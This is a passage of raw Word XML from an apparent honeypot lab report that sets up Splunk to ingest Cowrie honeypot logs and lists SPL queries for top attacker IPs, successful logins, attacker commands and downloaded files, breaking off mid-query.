          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>splunk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> start --accept-license</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F627F7C" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>When prompted, create an admin username and password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C1AB4A" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="10D4F773" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc231686575"/>
      <w:r>
        <w:t>Step 3 — Enable Splunk to Start on Boot</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="5525A7C8"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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> /opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>splunk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>splunk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> enable boot-start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A2758E" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="13849085" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc231686576"/>
      <w:r>
        <w:t>Step 4 — Access Splunk Web Interface</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="5FA9002D"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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a | grep </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7178B196"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http://192.168.56.22:8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E41AF45" w14:textId="51517E4F" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C8B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NAT network isolation restricts Splunk web interface access to the Ubuntu </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C8B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>VM's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C8B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> local browser. Configure VirtualBox port forwarding (host port 8000 → guest port 8000) to enable access from the host machine or external analyst workstation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EDB391" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="520EC925" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc231686577"/>
      <w:r>
        <w:t>Step 5 — Add Cowrie Logs as Splunk Data Source</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="1C4779DE" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Click Settings → Add Data → Monitor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1B02ED" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Select Files &amp; Directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104C30AB" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Enter path: /home/cowrie/cowrie/var/log/cowrie/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cowrie.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="55F3B941" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Set Source type to: _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0216E81B" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Click Next → Review → Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D30017" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="1333119C" w14:textId="77777777" w:rsidR="00466E30" w:rsidRDefault="00466E30"/>
    <w:p w14:paraId="4A6042BB" w14:textId="77777777" w:rsidR="00466E30" w:rsidRDefault="00466E30"/>
    <w:p w14:paraId="79B73EE3" w14:textId="77777777" w:rsidR="00466E30" w:rsidRDefault="00466E30"/>
    <w:p w14:paraId="32AF8CD6" w14:textId="77777777" w:rsidR="00466E30" w:rsidRDefault="00466E30"/>
    <w:p w14:paraId="11403235" w14:textId="77777777" w:rsidR="00466E30" w:rsidRDefault="00466E30"/>
    <w:p w14:paraId="10B7599D" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc231686578"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step 6 — Verify Log Ingestion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="64F58BB0"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 xml:space="preserve">index=main </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sourcetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> | head 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFCCCDC" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Cowrie log entries appearing in search results confirm the pipeline is operational.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4BD94F" w14:textId="4E316CCD" w:rsidR="0062444D" w:rsidRPr="00455F63" w:rsidRDefault="00455F63">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EE7ABB6" wp14:editId="02838870">
            <wp:extent cx="6172200" cy="2980055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1557120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20498" name="Picture 15571204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2980055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Figure 3: Cowrie JSON log ingestion verified in Splunk — data pipeline operational</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDC66D1" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="016145D5" w14:textId="590535C8" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc231686579"/>
      <w:r>
        <w:t>5.2 Attack Dashboard — SPL Queries</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="0BC0B10F" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Top attacker IP addresses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A553429"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 xml:space="preserve">index=main </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sourcetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> | stats count by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>src_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> | sort -count | head 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BEF894" w14:textId="656B043C" w:rsidR="0062444D" w:rsidRPr="00787FFD" w:rsidRDefault="00787FFD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38DAE8E1" wp14:editId="163743F5">
            <wp:extent cx="6172200" cy="2468880"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1870315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15092" name="Picture 18703150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2468880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Figure 4: Splunk — Top attacker IP addresses. Single source (192.168.56.26) responsible for all 65 recorded events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E61624E" w14:textId="77777777" w:rsidR="00BA61EA" w:rsidRDefault="00BA61EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06530263" w14:textId="2FA81604" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Successful logins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398F416B"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 xml:space="preserve">index=main </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sourcetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>json</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eventid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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cowrie.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>login.success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> | table _time </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>src_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> username password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CD7B37" w14:textId="512FD9E2" w:rsidR="0062444D" w:rsidRPr="00787FFD" w:rsidRDefault="00787FFD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="519B80B5" wp14:editId="3A3FDD6E">
            <wp:extent cx="6172200" cy="2954020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="516109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9151" name="Picture 5161091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2954020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Figure 5: Splunk — Successful login events. Nine sessions captured at 22:38:15 on 2026-06-05 using root credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E726671" w14:textId="77777777" w:rsidR="00466E30" w:rsidRDefault="00466E30">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30FCC28D" w14:textId="1BB30E26" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Commands typed by attackers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC05F55"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 xml:space="preserve">index=main </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sourcetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>json</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eventid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cowrie.command</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.input</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> | table _time </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>src_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73111FA9" w14:textId="2E5C0C47" w:rsidR="00054BAC" w:rsidRDefault="00787FFD" w:rsidP="00361CDB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17B7E73C" wp14:editId="16404265">
            <wp:extent cx="6172200" cy="2967355"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="761114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14052" name="Picture 7611140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2967355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Figure 6: Splunk — Attacker command sequence. Seven post-login commands captured mapping to five MITRE ATT&amp;CK techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41895225" w14:textId="077A1F58" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Files downloaded by attackers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C212A1C"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 xml:space="preserve">index=main </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sourcetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>json</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eventid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cowrie.session</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
